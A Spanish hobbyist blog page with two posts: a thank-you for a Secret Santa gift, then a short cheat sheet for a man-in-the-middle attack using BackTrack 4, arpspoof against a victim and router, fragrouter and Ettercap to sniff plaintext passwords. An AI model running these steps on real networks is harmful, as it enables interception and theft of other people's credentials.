Amigo Invisible @SuperFriki

Hoy me ha llegado el regalo de @SuperFriki del amigo invisible que realizo en su blog, la verdad que no me lo esperaba, justamente esperaba un paquete pero de SEUR y al abrir la puerta y ver que era MRW ya ni tenia ni idea que podia ser, pero al leer el nombre del remitente ya sospeche de que se trataba y de quien lo enviaba ;).

 

Aqui unas fotos de todo.

 

Me ha echo mucha ilusion recibirlo, y la verdad como bien dice son dos cosas que son siempre utiles, y el pendrive nunca habia visto ese diseño, la verdad que es bastante chulo.

Muchas Gracias! Desde aqui os invito a participar en proximas ocasiones y a que sigais su blog!

 

 

Ataque MitM

Desde http://andalinux.wordpress.com visite un curioso manual de como realizarlo, con lo cual me puse a ello y aqui os dejo el video de su procedimiento:

Originariamente de: http://andalinux.wordpress.com/2008/09/04/ataque-man-in-the-middle/

UNa rapida explicacion de lo que hace: http://andalinux.wordpress.com/2008/09/23/explicacion-grafica-del-ataque-man-in-the-middle/

Y una chuletilla:

Instrucciones en Backtrack4 por cable: (en maquina virtual, recuerda poner la tarjeta de red en bridged)
user: root
passwd: toor
startx (iniciar el modo grafico)
---Abrir un terminal---
dhclient
arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER
---Abrir una nueva pestaña en el terminal---
fragrouter -B1
Inicio Internet EtterCap -> Sniff -> Unified Sniffer -> Tarjeta de red y Aceptar.
Start -> Start Sniffing.
En el ettercap abajo, iran apareciendo las contraseñas en texto plano.